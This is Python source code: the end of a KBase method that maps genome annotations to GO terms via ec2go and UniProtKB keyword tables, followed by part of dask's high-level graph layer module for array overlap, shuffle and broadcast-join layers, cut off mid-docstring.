'/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using ec2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'ec2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_ec2go # At some point might do deeper type checking... if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_ec2go return value ' + 'output is not type dict as required.') # return the results return [output] def remap_annotations_with_uniprotkb_keyword2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_uniprotkb_keyword2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_uniprotkb_keyword2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be based to your method by its workspace name. Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the ContigSet data, we get the first element of the list, and # look at the 'data' field. genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'uniprotkb_kw2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the uniprotkb_keyword2go mapping operation # Add GO terms to Genome object # print trans n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: n_total_features += 1 fid = fea['id'] function = fea.get('function') if not function: continue go_list = [] for term in trans.keys(): keyword = trans[term]['name'] if function.lower().find(keyword.lower()) >= 0: equiv_terms = trans.get(term) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) go_list.extend(go) go_list = self.uniq_seen(go_list) if len(go_list): n_features_mapped += 1 go_func = ' / '.join(sorted(go_list)) self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}"to "{}".'.format(fid, function, go_func)) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using uniprotkb_keyword2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'uniprotkb_keyword2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_uniprotkb_keyword2go # At some point might do deeper type checking... if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_uniprotkb_keyword2go return value ' + 'output is not type dict as required.') # return the results return [output]
from __future__ import annotations import functools import math import operator from collections import defaultdict from itertools import product from typing import Any import tlz as toolz from tlz.curried import map from .base import tokenize from .blockwise import Blockwise, BlockwiseDep, BlockwiseDepDict, blockwise_token from .core import flatten, keys_in_tasks from .highlevelgraph import Layer from .utils import ( apply, cached_cumsum, concrete, insert, stringify, stringify_collection_keys, ) # ## ### General Utilities ## # class CallableLazyImport: """Function Wrapper for Lazy Importing. This Class should only be used when materializing a graph on a distributed scheduler. """ def __init__(self, function_path): self.function_path = function_path def __call__(self, *args, **kwargs): from distributed.utils import import_term return import_term(self.function_path)(*args, **kwargs) # ## ### Array Layers & Utilities ## # class ArrayBlockwiseDep(BlockwiseDep): """ Blockwise dep for array-likes, which only needs chunking information to compute its data. """ chunks: tuple[tuple[int, ...], ...] numblocks: tuple[int, ...] produces_tasks: bool = False def __init__(self, chunks: tuple[tuple[int, ...], ...]): self.chunks = chunks self.numblocks = tuple(len(chunk) for chunk in chunks) self.produces_tasks = False def __getitem__(self, idx: tuple[int, ...]): raise NotImplementedError("Subclasses must implement __getitem__") def __dask_distributed_pack__( self, required_indices: list[tuple[int, ...]] | None = None ): return {"chunks": self.chunks} @classmethod def __dask_distributed_unpack__(cls, state): return cls(**state) class ArrayChunkShapeDep(ArrayBlockwiseDep): """Produce chunk shapes given a chunk index""" def __getitem__(self, idx: tuple[int, ...]): return tuple(chunk[i] for i, chunk in zip(idx, self.chunks)) class ArraySliceDep(ArrayBlockwiseDep): """Produce slice(s) into the full-sized array given a chunk index""" starts: tuple[tuple[int, ...], ...] def __init__(self, chunks: tuple[tuple[int, ...], ...]): super().__init__(chunks) self.starts = tuple(cached_cumsum(c, initial_zero=True) for c in chunks) def __getitem__(self, idx: tuple): loc = tuple((start[i], start[i + 1]) for i, start in zip(idx, self.starts)) return tuple(slice(*s, None) for s in loc) class ArrayOverlapLayer(Layer): """Simple HighLevelGraph array overlap layer. Lazily computed High-level graph layer for a array overlap operations. Parameters ---------- name : str Name of new output overlap array. array : Dask array axes: Mapping Axes dictionary indicating overlap in each dimension, e.g. ``{'0': 1, '1': 1}`` """ def __init__( self, name, axes, chunks, numblocks, token, ): super().__init__() self.name = name self.axes = axes self.chunks = chunks self.numblocks = numblocks self.token = token self._cached_keys = None def __repr__(self): return f"ArrayOverlapLayer<name='{self.name}'" @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def is_materialized(self): return hasattr(self, "_cached_dict") def get_output_keys(self): return self.keys() # FIXME! this implementation materializes the graph def _dask_keys(self): if self._cached_keys is not None: return self._cached_keys name, chunks, numblocks = self.name, self.chunks, self.numblocks def keys(*args): if not chunks: return [(name,)] ind = len(args) if ind + 1 == len(numblocks): result = [(name,) + args + (i,) for i in range(numblocks[ind])] else: result = [keys(*(args + (i,))) for i in range(numblocks[ind])] return result self._cached_keys = result = keys() return result def _construct_graph(self, deserializing=False): """Construct graph for a simple overlap operation.""" axes = self.axes chunks = self.chunks name = self.name dask_keys = self._dask_keys() getitem_name = "getitem-" + self.token overlap_name = "overlap-" + self.token if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concatenate3 = CallableLazyImport("dask.array.core.concatenate3") else: # Not running on distributed scheduler - Use explicit functions from dask.array.core import concatenate3 dims = list(map(len, chunks)) expand_key2 = functools.partial( _expand_keys_around_center, dims=dims, axes=axes ) # Make keys for each of the surrounding sub-arrays interior_keys = toolz.pipe( dask_keys, flatten, map(expand_key2), map(flatten), toolz.concat, list ) interior_slices = {} overlap_blocks = {} for k in interior_keys: frac_slice = fractional_slice((name,) + k, axes) if (name,) + k != frac_slice: interior_slices[(getitem_name,) + k] = frac_slice else: interior_slices[(getitem_name,) + k] = (name,) + k overlap_blocks[(overlap_name,) + k] = ( concatenate3, (concrete, expand_key2((None,) + k, name=getitem_name)), ) dsk = toolz.merge(interior_slices, overlap_blocks) return dsk @classmethod def __dask_distributed_unpack__(cls, state): return cls(**state)._construct_graph(deserializing=True) def _expand_keys_around_center(k, dims, name=None, axes=None): """Get all neighboring keys around center Parameters ---------- k: tuple They key around which to generate new keys dims: Sequence[int] The number of chunks in each dimension name: Option[str] The name to include in the output keys, or none to include no name axes: Dict[int, int] The axes active in the expansion. We don't expand on non-active axes Examples -------- >>> _expand_keys_around_center(('x', 2, 3), dims=[5, 5], name='y', axes={0: 1, 1: 1}) # noqa: E501 # doctest: +NORMALIZE_WHITESPACE [[('y', 1.1, 2.1), ('y', 1.1, 3), ('y', 1.1, 3.9)], [('y', 2, 2.1), ('y', 2, 3), ('y', 2, 3.9)], [('y', 2.9, 2.1), ('y', 2.9, 3), ('y', 2.9, 3.9)]] >>> _expand_keys_around_center(('x', 0, 4), dims=[5, 5], name='y', axes={0: 1, 1: 1}) # noqa: E501 # doctest: +NORMALIZE_WHITESPACE [[('y', 0, 3.1), ('y', 0, 4)], [('y', 0.9, 3.1), ('y', 0.9, 4)]] """ def inds(i, ind): rv = [] if ind - 0.9 > 0: rv.append(ind - 0.9) rv.append(ind) if ind + 0.9 < dims[i] - 1: rv.append(ind + 0.9) return rv shape = [] for i, ind in enumerate(k[1:]): num = 1 if ind > 0: num += 1 if ind < dims[i] - 1: num += 1 shape.append(num) args = [ inds(i, ind) if any((axes.get(i, 0),)) else [ind] for i, ind in enumerate(k[1:]) ] if name is not None: args = [[name]] + args seq = list(product(*args)) shape2 = [d if any((axes.get(i, 0),)) else 1 for i, d in enumerate(shape)] result = reshapelist(shape2, seq) return result def reshapelist(shape, seq): """Reshape iterator to nested shape >>> reshapelist((2, 3), range(6)) [[0, 1, 2], [3, 4, 5]] """ if len(shape) == 1: return list(seq) else: n = int(len(seq) / shape[0]) return [reshapelist(shape[1:], part) for part in toolz.partition(n, seq)] def fractional_slice(task, axes): """ >>> fractional_slice(('x', 5.1), {0: 2}) (<built-in function getitem>, ('x', 5), (slice(-2, None, None),)) >>> fractional_slice(('x', 3, 5.1), {0: 2, 1: 3}) (<built-in function getitem>, ('x', 3, 5), (slice(None, None, None), slice(-3, None, None))) >>> fractional_slice(('x', 2.9, 5.1), {0: 2, 1: 3}) (<built-in function getitem>, ('x', 3, 5), (slice(0, 2, None), slice(-3, None, None))) """ rounded = (task[0],) + tuple(int(round(i)) for i in task[1:]) index = [] for i, (t, r) in enumerate(zip(task[1:], rounded[1:])): depth = axes.get(i, 0) if isinstance(depth, tuple): left_depth = depth[0] right_depth = depth[1] else: left_depth = depth right_depth = depth if t == r: index.append(slice(None, None, None)) elif t < r and right_depth: index.append(slice(0, right_depth)) elif t > r and left_depth: index.append(slice(-left_depth, None)) else: index.append(slice(0, 0)) index = tuple(index) if all(ind == slice(None, None, None) for ind in index): return task else: return (operator.getitem, rounded, index) # ## ### DataFrame Layers & Utilities ## # class SimpleShuffleLayer(Layer): """Simple HighLevelGraph Shuffle layer High-level graph layer for a simple shuffle operation in which each output partition depends on all input partitions. Parameters ---------- name : str Name of new shuffled output collection. column : str or list of str Column(s) to be used to map rows to output partitions (by hashing). npartitions : int Number of output partitions. npartitions_input : int Number of partitions in the original (un-shuffled) DataFrame. ignore_index: bool, default False Ignore index during shuffle. If ``True``, performance may improve, but index values will not be preserved. name_input : str Name of input collection. meta_input : pd.DataFrame-like object Empty metadata of input collection. parts_out : list of int (optional) List of required output-partition indices. annotations : dict (optional) Layer annotations """ def __init__( self, name, column, npartitions, npartitions_input, ignore_index, name_input, meta_input, parts_out=None, annotations=None, ): super().__init__(annotations=annotations) self.name = name self.column = column self.npartitions = npartitions self.npartitions_input = npartitions_input self.ignore_index = ignore_index self.name_input = name_input self.meta_input = meta_input self.parts_out = parts_out or range(npartitions) self.split_name = "split-" + self.name # The scheduling policy of Dask is generally depth-first, # which works great in most cases. However, in case of shuffle, # it increases the memory usage significantly. This is because # depth-first delays the freeing of the result of `shuffle_group()` # until the end of the shuffling. # # We address this by manually setting a high "prioroty" to the # `getitem()` ("split") tasks, using annotations. This forces a # breadth-first scheduling of the tasks tath directly depend on # the `shuffle_group()` output, allowing that data to be freed # much earlier. # # See https://github.com/dask/dask/pull/6051 for a detailed discussion. self.annotations = self.annotations or {} if "priority" not in self.annotations: self.annotations["priority"] = {} self.annotations["priority"]["__expanded_annotations__"] = None self.annotations["priority"].update({_key: 1 for _key in self.get_split_keys()}) def get_split_keys(self): # Return SimpleShuffleLayer "split" keys return [ stringify((self.split_name, part_out, part_in)) for part_in in range(self.npartitions_input) for part_out in self.parts_out ] def get_output_keys(self): return {(self.name, part) for part in self.parts_out} def __repr__(self): return "SimpleShuffleLayer<name='{}', npartitions={}>".format( self.name, self.npartitions ) def is_materialized(self): return hasattr(self, "_cached_dict") @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def _keys_to_parts(self, keys): """Simple utility to convert keys to partition indices.""" parts = set() for key in keys: try: _name, _part = key except ValueError: continue if _name != self.name: continue parts.add(_part) return parts def _cull_dependencies(self, keys, parts_out=None): """Determine the necessary dependencies to produce `keys`. For a simple shuffle, output partitions always depend on all input partitions. This method does not require graph materialization. """ deps = defaultdict(set) parts_out = parts_out or self._keys_to_parts(keys) for part in parts_out: deps[(self.name, part)] |= { (self.name_input, i) for i in range(self.npartitions_input) } return deps def _cull(self, parts_out): return SimpleShuffleLayer( self.name, self.column, self.npartitions, self.npartitions_input, self.ignore_index, self.name_input, self.meta_input, parts_out=parts_out, ) def cull(self, keys, all_keys): """Cull a SimpleShuffleLayer HighLevelGraph layer. The underlying graph will only include the necessary tasks to produce the keys (indicies) included in `parts_out`. Therefore, "culling" the layer only requires us to reset this parameter. """ parts_out = self._keys_to_parts(keys) culled_deps = self._cull_dependencies(keys, parts_out=parts_out) if parts_out != set(self.parts_out): culled_layer = self._cull(parts_out) return culled_layer, culled_deps else: return self, culled_deps def __reduce__(self): attrs = [ "name", "column", "npartitions", "npartitions_input", "ignore_index", "name_input", "meta_input", "parts_out", "annotations", ] return (SimpleShuffleLayer, tuple(getattr(self, attr) for attr in attrs)) def __dask_distributed_pack__( self, all_hlg_keys, known_key_dependencies, client, client_keys ): from distributed.protocol.serialize import to_serialize return { "name": self.name, "column": self.column, "npartitions": self.npartitions, "npartitions_input": self.npartitions_input, "ignore_index": self.ignore_index, "name_input": self.name_input, "meta_input": to_serialize(self.meta_input), "parts_out": list(self.parts_out), } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.worker import dumps_task # msgpack will convert lists into tuples, here # we convert them back to lists if isinstance(state["column"], tuple): state["column"] = list(state["column"]) if "inputs" in state: state["inputs"] = list(state["inputs"]) # Materialize the layer layer_dsk = cls(**state)._construct_graph(deserializing=True) # Convert all keys to strings and dump tasks layer_dsk = { stringify(k): stringify_collection_keys(v) for k, v in layer_dsk.items() } keys = layer_dsk.keys() | dsk.keys() # TODO: use shuffle-knowledge to calculate dependencies more efficiently deps = {k: keys_in_tasks(keys, [v]) for k, v in layer_dsk.items()} return {"dsk": toolz.valmap(dumps_task, layer_dsk), "deps": deps} def _construct_graph(self, deserializing=False): """Construct graph for a simple shuffle operation.""" shuffle_group_name = "group-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concat_func = CallableLazyImport("dask.dataframe.core._concat") shuffle_group_func = CallableLazyImport( "dask.dataframe.shuffle.shuffle_group" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.core import _concat as concat_func from dask.dataframe.shuffle import shuffle_group as shuffle_group_func dsk = {} for part_out in self.parts_out: _concat_list = [ (self.split_name, part_out, part_in) for part_in in range(self.npartitions_input) ] dsk[(self.name, part_out)] = ( concat_func, _concat_list, self.ignore_index, ) for _, _part_out, _part_in in _concat_list: dsk[(self.split_name, _part_out, _part_in)] = ( operator.getitem, (shuffle_group_name, _part_in), _part_out, ) if (shuffle_group_name, _part_in) not in dsk: dsk[(shuffle_group_name, _part_in)] = ( shuffle_group_func, (self.name_input, _part_in), self.column, 0, self.npartitions, self.npartitions, self.ignore_index, self.npartitions, ) return dsk class ShuffleLayer(SimpleShuffleLayer): """Shuffle-stage HighLevelGraph layer High-level graph layer corresponding to a single stage of a multi-stage inter-partition shuffle operation. Stage: (shuffle-group) -> (shuffle-split) -> (shuffle-join) Parameters ---------- name : str Name of new (partially) shuffled collection. column : str or list of str Column(s) to be used to map rows to output partitions (by hashing). inputs : list of tuples Each tuple dictates the data movement for a specific partition. stage : int Index of the current shuffle stage. npartitions : int Number of output partitions for the full (multi-stage) shuffle. npartitions_input : int Number of partitions in the original (un-shuffled) DataFrame. k : int A partition is split into this many groups during each stage. ignore_index: bool, default False Ignore index during shuffle. If ``True``, performance may improve, but index values will not be preserved. name_input : str Name of input collection. meta_input : pd.DataFrame-like object Empty metadata of input collection. parts_out : list of int (optional) List of required output-partition indices. annotations : dict (optional) Layer annotations """ def __init__( self, name, column, inputs, stage, npartitions, npartitions_input, nsplits, ignore_index, name_input, meta_input, parts_out=None, annotations=None, ): self.inputs = inputs self.stage = stage self.nsplits = nsplits super().__init__( name, column, npartitions, npartitions_input, ignore_index, name_input, meta_input, parts_out=parts_out or range(len(inputs)), annotations=annotations, ) def get_split_keys(self): # Return ShuffleLayer "split" keys keys = [] for part in self.parts_out: out = self.inputs[part] for i in range(self.nsplits): keys.append( stringify( ( self.split_name, out[self.stage], insert(out, self.stage, i), ) ) ) return keys def __repr__(self): return "ShuffleLayer<name='{}', stage={}, nsplits={}, npartitions={}>".format( self.name, self.stage, self.nsplits, self.npartitions ) def __reduce__(self): attrs = [ "name", "column", "inputs", "stage", "npartitions", "npartitions_input", "nsplits", "ignore_index", "name_input", "meta_input", "parts_out", "annotations", ] return (ShuffleLayer, tuple(getattr(self, attr) for attr in attrs)) def __dask_distributed_pack__(self, *args, **kwargs): ret = super().__dask_distributed_pack__(*args, **kwargs) ret["inputs"] = self.inputs ret["stage"] = self.stage ret["nsplits"] = self.nsplits return ret def _cull_dependencies(self, keys, parts_out=None): """Determine the necessary dependencies to produce `keys`. Does not require graph materialization. """ deps = defaultdict(set) parts_out = parts_out or self._keys_to_parts(keys) inp_part_map = {inp: i for i, inp in enumerate(self.inputs)} for part in parts_out: out = self.inputs[part] for k in range(self.nsplits): _inp = insert(out, self.stage, k) _part = inp_part_map[_inp] if self.stage == 0 and _part >= self.npartitions_input: deps[(self.name, part)].add(("group-" + self.name, _inp, "empty")) else: deps[(self.name, part)].add((self.name_input, _part)) return deps def _cull(self, parts_out): return ShuffleLayer( self.name, self.column, self.inputs, self.stage, self.npartitions, self.npartitions_input, self.nsplits, self.ignore_index, self.name_input, self.meta_input, parts_out=parts_out, ) def _construct_graph(self, deserializing=False): """Construct graph for a "rearrange-by-column" stage.""" shuffle_group_name = "group-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concat_func = CallableLazyImport("dask.dataframe.core._concat") shuffle_group_func = CallableLazyImport( "dask.dataframe.shuffle.shuffle_group" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.core import _concat as concat_func from dask.dataframe.shuffle import shuffle_group as shuffle_group_func dsk = {} inp_part_map = {inp: i for i, inp in enumerate(self.inputs)} for part in self.parts_out: out = self.inputs[part] _concat_list = [] # get_item tasks to concat for this output partition for i in range(self.nsplits): # Get out each individual dataframe piece from the dicts _inp = insert(out, self.stage, i) _idx = out[self.stage] _concat_list.append((self.split_name, _idx, _inp)) # concatenate those pieces together, with their friends dsk[(self.name, part)] = ( concat_func, _concat_list, self.ignore_index, ) for _, _idx, _inp in _concat_list: dsk[(self.split_name, _idx, _inp)] = ( operator.getitem, (shuffle_group_name, _inp), _idx, ) if (shuffle_group_name, _inp) not in dsk: # Initial partitions (output of previous stage) _part = inp_part_map[_inp] if self.stage == 0: if _part < self.npartitions_input: input_key = (self.name_input, _part) else: # In order to make sure that to_serialize() serialize the # empty dataframe input, we add it as a key. input_key = (shuffle_group_name, _inp, "empty") dsk[input_key] = self.meta_input else: input_key = (self.name_input, _part) # Convert partition into dict of dataframe pieces dsk[(shuffle_group_name, _inp)] = ( shuffle_group_func, input_key, self.column, self.stage, self.nsplits, self.npartitions_input, self.ignore_index, self.npartitions, ) return dsk class BroadcastJoinLayer(Layer): """Broadcast-based Join Layer High-level graph layer for a join operation requiring the smaller collection to be broadcasted to every partition of the larger collection. Parameters ---------- name : str Name of new (joined) output collection. lhs_name: string "Left" DataFrame collection to join. lhs_npartitions: int Number of partitions in "left" DataFrame collection. rhs_name: string "Right" DataFrame collection to join. rhs_npartitions: int Number of partitions in "right" DataFrame collection. parts_out : list of int (optional) List of required output-partition indices. annotations : dict (optional) Layer annotations. **merge_kwargs : **dict Keyword arguments to be passed to chunkwise merge func. """ def __init__( self, name, npartitions, lhs_name, lhs_npartitions, rhs_name, rhs_npartitions, parts_out=None, annotations=None, **merge_kwargs, ): super().__init__(annotations=annotations) self.name = name self.npartitions = npartitions self.lhs_name = lhs_name self.lhs_npartitions = lhs_npartitions self.rhs_name = rhs_name self.rhs_npartitions = rhs_npartitions self.parts_out = parts_out or set(range(self.npartitions)) self.merge_kwargs = merge_kwargs self.how = self.merge_kwargs.get("how") self.left_on = self.merge_kwargs.get("left_on") self.right_on = self.merge_kwargs.get("right_on") if isinstance(self.left_on, list): self.left_on = (list, tuple(self.left_on)) if isinstance(self.right_on, list): self.right_on = (list, tuple(self.right_on)) def get_output_keys(self): return {(self.name, part) for part in self.parts_out} def __repr__(self): return "BroadcastJoinLayer<name='{}', how={}, lhs={}, rhs={}>".format( self.name, self.how, self.lhs_name, self.rhs_name ) def is_materialized(self): return hasattr(self, "_cached_dict") @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def __dask_distributed_pack__(self, *args, **kwargs): import pickle # Pickle complex merge_kwargs elements. Also # tuples, which may be confused with keys. _merge_kwargs = {} for k, v in self.merge_kwargs.items(): if not isinstance(v, (str, list, bool)): _merge_kwargs[k] = pickle.dumps(v) else: _merge_kwargs[k] = v return { "name": self.name, "npartitions": self.npartitions, "lhs_name": self.lhs_name, "lhs_npartitions": self.lhs_npartitions, "rhs_name": self.rhs_name, "rhs_npartitions": self.rhs_npartitions, "parts_out": self.parts_out, "merge_kwargs": _merge_kwargs, } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.worker import dumps_task # Expand merge_kwargs merge_kwargs = state.pop("merge_kwargs", {}) state.update(merge_kwargs) # Materialize the layer raw = cls(**state)._construct_graph(deserializing=True) # Convert all keys to strings and dump tasks raw = {stringify(k): stringify_collection_keys(v) for k, v in raw.items()} keys = raw.keys() | dsk.keys() deps = {k: keys_in_tasks(keys, [v]) for k, v in raw.items()} return {"dsk": toolz.valmap(dumps_task, raw), "deps": deps} def _keys_to_parts(self, keys): """Simple utility to convert keys to partition indices.""" parts = set() for key in keys: try: _name, _part = key except ValueError: continue if _name != self.name: continue parts.add(_part) return parts @property def _broadcast_plan(self): # Return structure (tuple): # ( # <broadcasted-collection-name>, # <broadcasted-collection-npartitions>, # <other-collection-npartitions>, # <other-collection-on>, # ) if self.lhs_npartitions < self.rhs_npartitions: # Broadcasting the left return ( self.lhs_name, self.lhs_npartitions, self.rhs_name, self.right_on, ) else: # Broadcasting the right return ( self.rhs_name, self.rhs_npartitions, self.lhs_name, self.left_on, ) def _cull_dependencies(self, keys, parts_out=None): """Determine the necessary dependencies to produce `keys`. For a broadcast join, output partitions always depend on all partitions of the broadcasted collection, but only one partition of the "other" collecction. """ # Get broadcast info bcast_name, bcast_size, other_name = self._broadcast_plan[:3] deps = defaultdict(set) parts_out = parts_out or self._keys_to_parts(keys) for part in parts_out: deps[(self.name, part)] |= {(bcast_name, i) for i in range(bcast_size)} deps[(self.name, part)] |= { (other_name, part), } return deps def _cull(self, parts_out): return BroadcastJoinLayer( self.name, self.npartitions, self.lhs_name, self.lhs_npartitions, self.rhs_name, self.rhs_npartitions, annotations=self.annotations, parts_out=parts_out, **self.merge_kwargs, ) def cull(self, keys, all_keys): """Cull a BroadcastJoinLayer HighLevelGraph layer. The underlying graph will only include the necessary tasks to produce the keys (indicies) included in `parts_out`. Therefore, "culling" the layer only requires us to reset this parameter. """ parts_out = self._keys_to_parts(keys) culled_deps = self._cull_dependencies(keys, parts_out=parts_out) if parts_out != set(self.parts_out): culled_layer = self._cull(parts_out) return culled_layer, culled_deps else: return self, culled_deps def _construct_graph(self, deserializing=False): """Construct graph for a broadcast join operation.""" inter_name = "inter-" + self.name split_name = "split-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler split_partition_func = CallableLazyImport( "dask.dataframe.multi._split_partition" ) concat_func = CallableLazyImport("dask.dataframe.multi._concat_wrapper") merge_chunk_func = CallableLazyImport( "dask.dataframe.multi._merge_chunk_wrapper" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.multi import _concat_wrapper as concat_func from dask.dataframe.multi import _merge_chunk_wrapper as merge_chunk_func from dask.dataframe.multi import _split_partition as split_partition_func # Get broadcast "plan" bcast_name, bcast_size, other_name, other_on = self._broadcast_plan bcast_side = "left" if self.lhs_npartitions < self.rhs_npartitions else "right" # Loop over output partitions, which should be a 1:1 # mapping with the input partitions of "other". # Culling should allow us to avoid generating tasks for # any output partitions that are not requested (via `parts_out`) dsk = {} for i in self.parts_out: # Split each "other" partition by hash if self.how != "inner": dsk[(split_name, i)] = ( split_partition_func, (other_name, i), other_on, bcast_size, ) # For each partition of "other", we need to join # to each partition of "bcast". If it is a "left" # or "right" join, there should be a unique mapping # between the local splits of "other" and the # partitions of "bcast" (which means we need an # additional `getitem` operation to isolate the # correct split of each "other" partition). _concat_list = [] for j in range(bcast_size): # Specify arg list for `merge_chunk` _merge_args = [ ( operator.getitem, (split_name, i), j, ) if self.how != "inner" else (other_name, i), (bcast_name, j), ] if bcast_side == "left": # If the left is broadcasted, the # arg list needs to be reversed _merge_args.reverse() inter_key = (inter_name, i, j) dsk[inter_key] = ( apply, merge_chunk_func, _merge_args, self.merge_kwargs, ) _concat_list.append(inter_key) # Concatenate the merged results for each output partition dsk[(self.name, i)] = (concat_func, _concat_list) return dsk class DataFrameIOLayer(Blockwise): """DataFrame-based Blockwise Layer with IO Parameters ---------- name : str Name to use for the constructed layer. columns : str, list or None Field name(s) to read in as columns in the output. inputs : list[tuple] List of arguments to be passed to ``io_func`` so that the materialized task to produce partition ``i`` will be: ``(<io_func>, inputs[i])``. Note that each element of ``inputs`` is typically a tuple of arguments. io_func : callable A callable function that takes in a single tuple of 